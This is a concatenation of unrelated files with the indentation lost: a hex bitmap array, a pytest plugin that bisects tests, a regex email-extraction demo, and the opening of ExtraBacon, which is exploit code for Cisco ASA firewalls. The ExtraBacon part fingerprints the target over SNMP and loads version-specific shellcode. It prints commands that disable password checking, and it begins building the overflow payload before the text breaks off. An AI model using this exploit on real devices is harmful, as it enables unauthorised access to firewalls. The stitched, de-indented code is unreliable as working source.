0X3F,0X07,0X00,0X7C,0X01,0XC0,0XF0,0X01,0XE0,0X70,0X00,0X1E,0X00,0X78,0X0F,0X80,
0X3F,0X00,0XF0,0X1E,0X00,0X38,0X00,0X01,0XF8,0X03,0X80,0X78,0X00,0XF8,0X3E,0X00,
0X70,0X01,0XF8,0X38,0X03,0XE0,0X0E,0X03,0X80,0X0F,0XC1,0XE0,0X07,0X80,0X1E,0X00,
0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X1F,0XFF,0XC0,0X0E,
0X00,0X07,0XC0,0X0E,0X03,0X80,0X03,0XE0,0XF0,0X03,0X80,0X03,0X80,0X00,0X1C,0X00,
0X1F,0X07,0X00,0X7C,0X01,0XC0,0XE0,0X00,0XF0,0X70,0X00,0X3C,0X00,0X3C,0X0F,0X80,
0X3E,0X00,0X70,0X1C,0X00,0X1C,0X00,0X01,0XF0,0X01,0XC0,0XF0,0X00,0X78,0X3C,0X00,
0XE0,0X00,0XF8,0X38,0X03,0XE0,0X0E,0X07,0X00,0X07,0XC1,0XE0,0X0F,0X00,0X0F,0X00,
0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X7F,0XFF,0XC0,0X0E,
0X00,0X07,0X80,0X0E,0X07,0X80,0X01,0XE0,0XF0,0X07,0X00,0X03,0X80,0X00,0X3C,0X00,
0X0F,0X03,0X00,0XFC,0X01,0X81,0XC0,0X00,0XF0,0X70,0X00,0X38,0X00,0X1C,0X0F,0X00,
0X1C,0X00,0X70,0X38,0X00,0X1C,0X00,0X01,0XE0,0X01,0XC0,0XE0,0X00,0X78,0X3C,0X01,
0XE0,0X00,0X78,0X1C,0X03,0XE0,0X0E,0X0F,0X00,0X03,0XC1,0XC0,0X0E,0X00,0X07,0X00,
0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0XFF,0XFF,0XC0,0X07,
0X00,0X07,0X00,0X06,0X07,0X00,0X00,0XE0,0XE0,0X07,0X00,0X01,0XC0,0X00,0X38,0X00,
0X0F,0X03,0X80,0XE6,0X03,0X81,0XC0,0X00,0X78,0X38,0X00,0X38,0X00,0X0E,0X0F,0X00,
0X1C,0X00,0X70,0X38,0X00,0X0E,0X00,0X01,0XE0,0X01,0XC0,0XE0,0X00,0X38,0X38,0X01,
0XC0,0X00,0X38,0X1C,0X07,0X70,0X1C,0X0E,0X00,0X03,0XC1,0XC0,0X1C,0X00,0X03,0X00,
0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X01,0XFF,0XFF,0XC0,0X07,
0X80,0X07,0X00,0X07,0X07,0X00,0X00,0XE0,0XE0,0X0F,0X00,0X01,0XC0,0X00,0X38,0X00,
0X07,0X03,0X80,0XCE,0X03,0X81,0XC0,0X00,0X78,0X3C,0X00,0X70,0X00,0X0E,0X0E,0X00,
0X1C,0X00,0X70,0X70,0X00,0X0E,0X00,0X01,0XC0,0X01,0XC1,0XC0,0X00,0X38,0X38,0X01,
0XC0,0X00,0X38,0X0C,0X07,0X70,0X1C,0X0E,0X00,0X01,0XC1,0XC0,0X1C,0X00,0X03,0X80,
0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X03,0XFF,0XFF,0XC0,0X03,
0XE0,0X07,0X00,0X07,0X07,0X00,0X00,0XE0,0XE0,0X0F,0XFF,0XFF,0XC0,0X00,0X30,0X00,
0X07,0X01,0XC1,0XC7,0X07,0X03,0XFF,0XFF,0XF8,0X1F,0X00,0X70,0X00,0X0E,0X0E,0X00,
0X1C,0X00,0X70,0X7F,0XFF,0XFE,0X00,0X01,0XC0,0X01,0XC1,0XC0,0X00,0X18,0X38,0X01,
0X80,0X00,0X38,0X0E,0X0E,0X38,0X38,0X1C,0X00,0X01,0XC1,0XC0,0X1F,0XFF,0XFF,0X80,
0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X07,0XFF,0XFF,0XC0,0X01,
0XF8,0X07,0X00,0X07,0X06,0X00,0X00,0XE0,0XE0,0X0F,0XFF,0XFF,0XC0,0X00,0X70,0X00,
0X07,0X01,0XC1,0XC7,0X07,0X03,0XFF,0XFF,0XF8,0X0F,0XC0,0X70,0X00,0X06,0X0E,0X00,
0X1C,0X00,0X70,0X7F,0XFF,0XFE,0X00,0X01,0XC0,0X01,0XC1,0XC0,0X00,0X18,0X38,0X03,
0X80,0X00,0X38,0X0E,0X0E,0X38,0X38,0X1C,0X00,0X01,0XC1,0XC0,0X1F,0XFF,0XFF,0X80,
0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X0F,0XFF,0XFF,0XC0,0X00,
0X7C,0X07,0X00,0X07,0X06,0X00,0X00,0XE0,0XE0,0X0E,0X00,0X00,0X00,0X00,0X70,0X00,
0X07,0X00,0XE3,0X83,0X8E,0X03,0X80,0X00,0X00,0X03,0XE0,0X70,0X00,0X06,0X0E,0X00,
0X1C,0X00,0X70,0X70,0X00,0X00,0X00,0X01,0XC0,0X01,0XC1,0XC0,0X00,0X18,0X38,0X03,
0X80,0X00,0X38,0X07,0X1C,0X1C,0X70,0X1C,0X00,0X01,0XC1,0XC0,0X1C,0X00,0X00,0X00,
0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X3F,0XFF,0XFF,0XC0,0X00,
0X1E,0X07,0X00,0X07,0X07,0X00,0X00,0XE0,0XE0,0X0E,0X00,0X00,0X00,0X00,0X30,0X00,
0X07,0X00,0XE3,0X83,0X8E,0X03,0X80,0X00,0X00,0X00,0XF0,0X70,0X00,0X0E,0X0E,0X00,
0X1C,0X00,0X70,0X70,0X00,0X00,0X00,0X01,0XC0,0X01,0XC1,0XC0,0X00,0X18,0X38,0X01,
0X80,0X00,0X38,0X07,0X1C,0X1C,0X70,0X1C,0X00,0X01,0XC1,0XC0,0X1C,0X00,0X00,0X00,
0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X7F,0XFF,0XFF,0XC0,0X00,
0X0F,0X07,0X00,0X07,0X07,0X00,0X00,0XE0,0XE0,0X0E,0X00,0X00,0X00,0X00,0X38,0X00,
0X07,0X00,0XE7,0X01,0XCC,0X01,0X80,0X00,0X00,0X00,0X78,0X70,0X00,0X0E,0X0E,0X00,
0X1C,0X00,0X70,0X70,0X00,0X00,0X00,0X01,0XC0,0X01,0XC1,0XC0,0X00,0X38,0X38,0X01,
0XC0,0X00,0X38,0X03,0X18,0X0E,0X60,0X0E,0X00,0X01,0XC1,0XC0,0X1C,0X00,0X00,0X00,
0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0XFF,0XFF,0XFF,0XC0,0X00,
0X07,0X07,0X00,0X07,0X07,0X00,0X00,0XE0,0XE0,0X07,0X00,0X00,0X00,0X00,0X38,0X00,
0X0F,0X00,0X77,0X01,0XCC,0X01,0XC0,0X00,0X00,0X00,0X38,0X70,0X00,0X0E,0X0E,0X00,
0X1C,0X00,0X70,0X38,0X00,0X00,0X00,0X01,0XC0,0X01,0XC0,0XE0,0X00,0X38,0X38,0X01,
0XC0,0X00,0X38,0X03,0XB8,0X0E,0XE0,0X0E,0X00,0X03,0XC1,0XC0,0X1C,0X00,0X00,0X00,
0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF9,0XFF,0XFF,0XFF,0XC0,0X00,
0X03,0X07,0X00,0X07,0X07,0X80,0X01,0XE0,0XE0,0X07,0X00,0X01,0X80,0X00,0X38,0X00,
0X0F,0X00,0X7E,0X01,0XFC,0X01,0XC0,0X00,0X70,0X00,0X38,0X38,0X00,0X1C,0X0E,0X00,
0X1C,0X00,0X70,0X38,0X00,0X0C,0X00,0X01,0XC0,0X01,0XC0,0XE0,0X00,0X38,0X38,0X01,
0XE0,0X00,0X78,0X01,0XF8,0X0F,0XE0,0X0E,0X00,0X03,0XC1,0XC0,0X0E,0X00,0X07,0X00,
0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X03,0X07,0X00,0X07,0X03,0X80,0X01,0XE0,0XE0,0X07,0X80,0X03,0X80,0X00,0X1C,0X00,
0X1F,0X00,0X3E,0X00,0XF8,0X00,0XE0,0X00,0XF0,0X00,0X38,0X3C,0X00,0X1C,0X0E,0X00,
0X1C,0X00,0X70,0X3C,0X00,0X1C,0X00,0X01,0XC0,0X01,0XC0,0XF0,0X00,0X78,0X38,0X00,
0XE0,0X00,0XF8,0X01,0XF0,0X07,0XC0,0X07,0X00,0X07,0XC1,0XC0,0X0E,0X00,0X07,0X00,
0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X07,0X07,0X00,0X07,0X01,0XC0,0X07,0XE0,0XE0,0X03,0XC0,0X07,0X00,0X00,0X1E,0X00,
0X3F,0X00,0X3C,0X00,0XF8,0X00,0XF0,0X01,0XF0,0X00,0X38,0X1E,0X00,0X38,0X0E,0X00,
0X1C,0X00,0X70,0X1E,0X00,0X38,0X00,0X01,0XC0,0X01,0XC0,0X78,0X00,0XF8,0X38,0X00,
0X70,0X01,0XF8,0X01,0XF0,0X07,0XC0,0X07,0X80,0X0F,0XC1,0XC0,0X07,0X00,0X0E,0X00,
0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X0C,
0X0F,0X07,0X00,0X07,0X01,0XF0,0X0F,0XE0,0XE0,0X01,0XE0,0X1F,0X00,0X00,0X0F,0X00,
0X7F,0X00,0X1C,0X00,0X70,0X00,0X78,0X03,0XE0,0X60,0X78,0X0F,0X00,0XF8,0X0E,0X00,
0X1C,0X00,0X70,0X0F,0X00,0XF8,0X00,0X01,0XC0,0X01,0XC0,0X3C,0X03,0XF8,0X38,0X00,
0X7C,0X03,0XF8,0X00,0XE0,0X03,0X80,0X03,0XC0,0X1F,0XC1,0XC0,0X03,0XC0,0X3C,0X00,
0X00,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X0F,
0X1E,0X07,0X00,0X07,0X00,0XFC,0X7E,0XE0,0XE0,0X00,0XF8,0X7E,0X00,0X00,0X07,0XE3,
0XF7,0X00,0X1C,0X00,0X70,0X00,0X3F,0X1F,0XC0,0X7C,0XF0,0X07,0XC3,0XF0,0X0E,0X00,
0X1C,0X00,0X70,0X07,0XC3,0XF0,0X00,0X01,0XC0,0X01,0XC0,0X1F,0X8F,0X98,0X38,0X00,
0X3F,0X1F,0XB8,0X00,0XE0,0X03,0X80,0X01,0XF8,0XFD,0XC1,0XC0,0X03,0XF1,0XFC,0X00,
0X00,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X07,
0XFC,0X07,0X00,0X07,0X00,0X3F,0XF8,0XE0,0XE0,0X00,0X7F,0XF8,0X00,0X00,0X03,0XFF,
0XC7,0X00,0X18,0X00,0X30,0X00,0X1F,0XFF,0X00,0X3F,0XE0,0X03,0XFF,0XC0,0X0E,0X00,
0X1C,0X00,0X70,0X03,0XFF,0XC0,0X00,0X01,0XC0,0X01,0XC0,0X0F,0XFF,0X38,0X38,0X00,
0X0F,0XFE,0X38,0X00,0X40,0X01,0X00,0X00,0X7F,0XF1,0XC1,0XC0,0X00,0XFF,0XF0,0X00,
0X00,0X00,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X03,
0XF8,0X07,0X00,0X06,0X00,0X1F,0XF0,0XE0,0XE0,0X00,0X1F,0XF0,0X00,0X00,0X00,0XFF,
0X06,0X00,0X00,0X00,0X30,0X00,0X07,0XFE,0X00,0X1F,0XC0,0X00,0XFF,0X00,0X06,0X00,
0X18,0X00,0X30,0X00,0XFF,0X80,0X00,0X00,0XC0,0X01,0XC0,0X03,0XFC,0X18,0X38,0X00,
0X07,0XFC,0X38,0X00,0X00,0X00,0X00,0X00,0X3F,0XC1,0X81,0X80,0X00,0X3F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
]
|
# -*- coding: utf-8 -*-
from typing import TYPE_CHECKING, List, Optional
import pytest
from _pytest import nodes
from _pytest.config import Config
from _pytest.config.argparsing import Parser
from _pytest.main import Session
from _pytest.reports import TestReport
if TYPE_CHECKING:
from _pytest.cacheprovider import Cache
CACHE_NAME = "cache/leakfinder"
def pytest_addoption(parser: Parser) -> None:
group = parser.getgroup("general")
group.addoption(
"--leak-finder",
action="store_true",
default=False,
dest="leakfinder",
help="Bisect previous passed tests until find one that fail",
)
@pytest.hookimpl
def pytest_configure(config: Config) -> None:
if config.getoption("leakfinder"):
config.pluginmanager.register(LeakFinderPlugin(config), "leakfinderplugin")
def pytest_sessionfinish(session: Session) -> None:
if not session.config.getoption("leakfinder"):
assert session.config.cache is not None
# Clear the cache if the plugin is not active.
session.config.cache.set(CACHE_NAME, {"steps": "", "target": None})
def bizect(l, steps="a"):
"""
given a list, select the a/b n-th group plus the last element
>>> l = list(range(10))
>>> bizect(l)
[0, 1, 2, 3, 4, 9]
>>> bizect(l, steps="b")
[5, 6, 7, 8, 9]
>>> bizect(l, "ba")
[5, 6, 9]
>>> bizect(l, "bb")
[7, 8, 9]
"""
r = l.copy()
for key in steps:
if key == "a":
r = r[:len(r)//2]
else:
r = r[len(r)//2:-1]
r += [l[-1]]
return r
class LeakFinderPlugin:
def __init__(self, config: Config) -> None:
self.config = config
self.session: Optional[Session] = None
self.report_status = ""
self.cache: Cache = config.cache
self.previous = self.cache.get(CACHE_NAME, {"steps": "", "target": None})
self.target = self.previous.get("target")
def pytest_sessionstart(self, session: Session) -> None:
self.session = session
def pytest_collection_modifyitems(
self, config: Config, items: List[nodes.Item]
) -> None:
if not self.target:
self.report_status = "no previously failed tests, not skipping."
return
# check all item nodes until we find a match on last failed
failed_index = None
for index, item in enumerate(items):
if item.nodeid == self.target:
failed_index = index
break
# If the previously failed test was not found among the test items,
# do not skip any tests.
if failed_index:
new_items = bizect(items[:failed_index + 1], steps=self.previous["steps"])
deselected = set(items) - set(new_items)
items[:] = new_items
config.hook.pytest_deselected(items=deselected)
def pytest_runtest_logreport(self, report: TestReport) -> None:
if not self.previous["steps"] and report.failed:
# the first fail on the first run set the target
self.previous["target"] = report.nodeid
self.previous["steps"] += "a"
self.session.shouldstop = True
print(f"\nLeak finder: target set to {report.nodeid}")
elif report.nodeid == self.previous["target"] and report.when == "call":
if report.failed:
print("\nLeak finder: The group selected still fails. Let's do a new partition.")
self.previous["steps"] += "a"
else:
print("\nLeak finder: We reach the target and nothing failed. Let's change the last half.")
self.previous["steps"] = self.previous["steps"][:-1] + "b"
def pytest_sessionfinish(self) -> None:
self.cache.set(CACHE_NAME, self.previous)
|
import re
import xml.etree.ElementTree as ET
import subprocess32 as subproces
import extraction.utils as utils
from extraction.core import ExtractionRunner
from extraction.runnables import Filter, Extractor, ExtractorResult
# Define extractors and filters
class HasNumbersFilter(Filter):
def filter(self, data, deps):
success = re.search(r'[0-9]', data, re.UNICODE)
return bool(success)
class EmailExtractor(Extractor):
result_file_name = 'emails.xml'
def extract(self, data, deps):
emails = re.findall(r'\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b',
data,
re.IGNORECASE | re.UNICODE)
root = ET.Element('extraction')
for email in emails:
ele = ET.SubElement(root, 'email')
ele.text = email
return ExtractorResult(xml_result=root)
class LinesStartWithNumberExtractor(Extractor):
dependencies = frozenset([HasNumbersFilter])
def extract(self, data, deps):
try:
(status, stdout, stderr) = utils.external_process(['awk', '/^[0-9]/ {print;}', '-'], input_data=data, timeout=5)
except subprocess.TimeoutExpired:
raise RunnableError('awk timed out')
lines = [line for line in stdout.split("\n") if line]
root = ET.Element('extraction')
for line in lines:
ele = ET.SubElement(root, 'line')
ele.text = line
return ExtractorResult(xml_result=root)
# Set up and run extraction
extraction_runner = ExtractionRunner()
extraction_runner.add_runnable(HasNumbersFilter)
extraction_runner.add_runnable(EmailExtractor)
extraction_runner.add_runnable(LinesStartWithNumberExtractor)
extraction_runner.run(u'''Random data that contains some emails bob@example.com
Test lines with some @ signs now and then. Meet you@home@2p.m.
Line with another email embedded howie009@yahoo.com in the line.
jones@gmail.com fredie@emerson.retail.com
123 Some lines even start with numbers
Some lines don't start with numbers
004 The final line in the test data''', 'extraction/test/sample_output', run_name = 'Sample Data')
|
#!/usr/bin/env python2
"""
Our goal with version 2.0 of ExtraBacon is to support more ASA versions, as well
as simplify the Python and payload shellcode. This means stripping as much as
possible from the shellcode and Python to still be functional.
"""
import sys
import string
import subprocess
import binascii
import random
import datetime
improved_dir = "./improved"
sys.path.insert(0, '..')
from Mexeggs.all import *
from Mexeggs import *
from scapy.all import *
##
##
##
class ExtrabaconInfoSubcommand(sploit.InfoSubcommand):
expect_filename_argument = False ##
def setup_parser(self, parser):
super(ExtrabaconInfoSubcommand, self).setup_parser(parser)
self.parser = parser
##
for a in self.parser._actions:
if a.dest == "version":
a.choices = ['v2c']
a.help = 'SNMP version (v2c only)'
def run(self, exp):
super(ExtrabaconInfoSubcommand, self).run(exp)
##
##
##
##
class ExtrabaconExecSubcommand(sploit.ExecSubcommand):
expect_filename_argument = False ##
def setup_parser(self, parser):
super(ExtrabaconExecSubcommand, self).setup_parser(parser)
self.parser = parser
##
for a in self.parser._actions:
if a.dest == "version":
a.choices = ['v2c']
a.help = 'SNMP version (v2c only)'
self.parser.add_argument('--mode',
help='select mode of operation',
choices=["pass-disable", "pass-enable", "mettle"],
required=True,
default=None)
self.parser.add_argument('--msg',
help='print success message on console of target (DO NOT USE)',
dest='msg',
action='store_true',
required=False,
default=False)
def run(self, exp):
super(ExtrabaconExecSubcommand, self).run(exp)
class Extrabacon(Sploit):
def setup_parser(self):
super(Extrabacon, self).setup_parser()
##
self.add_subcommand(ExtrabaconInfoSubcommand())
##
self.add_subcommand(ExtrabaconExecSubcommand())
##
##
def generate_touch(self):
return SNMP(version = self.params.version,
community = self.params.community,
PDU = SNMPget(varbindlist = [SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.1.0')),
SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.3.0')),
SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.5.0'))]))
def fw_version_check(self, vers_string):
# let's try a more generic approach
version = vers_string.split("Version ")[1]
version = version.replace(".", "_")
# well this is crappy
fname = improved_dir + '/shellcode_' + version + '.py'
if not os.path.isfile(fname):
return "unsupported"
return version
def post_touch(self, response):
##
##
values = [x[SNMPvarbind].value.val for x in SNMP(response)[SNMP][SNMPresponse].varbindlist]
if not values:
return False
##
snmp = SNMP(response)
print "[+] response:"
snmp.show()
fw_uptime = values[1]
fw_uptime_str = str(datetime.timedelta(seconds=fw_uptime/100))
print
print "[+] firewall uptime is %d time ticks, or %s" % (fw_uptime, fw_uptime_str)
print
fw_name = values[2]
print "[+] firewall name is %s" % fw_name
print
fw_vers = self.fw_version_check(values[0])
if fw_vers != "unsupported":
print "[+] target is running %s, which is supported" % fw_vers
else:
print "[-] target is running %s, which is NOT supported" % values[0]
self.key_data = fw_vers ##
if self.params.verbose:
print 'Data stored in key file : %s' % self.key_data
##
##
return True
def load_vinfo(self):
self.vinfo = self.key_data.upper()
if self.params.verbose:
print 'Data stored in self.vinfo: %s' % self.vinfo
def report_key(self, key):
print "\nTo check the key file to see if it really contains what we're claiming:"
print "# cat %s" % self.get_key_file(key = key)
if self.key_data.lower() == "unsupported":
return
print "\nTo disable password checking on target:"
print "# %s exec -k %s %s --mode pass-disable" % (self.env.progname, key, " ".join(self.params.args[2:]))
print "\nTo enable password checking on target:"
print "# %s exec -k %s %s --mode pass-enable" % (self.env.progname, key, " ".join(self.params.args[2:]))
##
##
##
print
def generate_exploit(self):
if not self.params.mode:
print "[-] no mode selected!"
sys.exit(1)
print "[+] generating exploit for exec mode %s" % self.params.mode
if self.key_data.lower() == "unsupported":
print "[-] unsupported target version, abort"
sys.exit(1)
if os.path.exists(improved_dir):
print "[+] using shellcode in %s" % improved_dir
sys.path.insert(0, improved_dir)
else:
print "[-] cannot find %s" % (improved_dir)
sys.exit(1)
self.sc_filename = "shellcode_%s" % self.key_data.lower()
print "[+] importing version-specific shellcode %s" % self.sc_filename
try:
sc = __import__(self.sc_filename)
except:
print "[-] problem importing version-specific shellcode from %s" % self.sc_filename
sys.exit(1)
##
# cufwUrlfServerStatus + .9
head = '1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9'
head_len = len(head.split('.'))
# do we patch, or restore original code
if self.params.mode == 'pass-disable':
always_true_code = "49.192.64.195"
pmcheck_bytes = always_true_code
admauth_bytes = always_true_code
else:
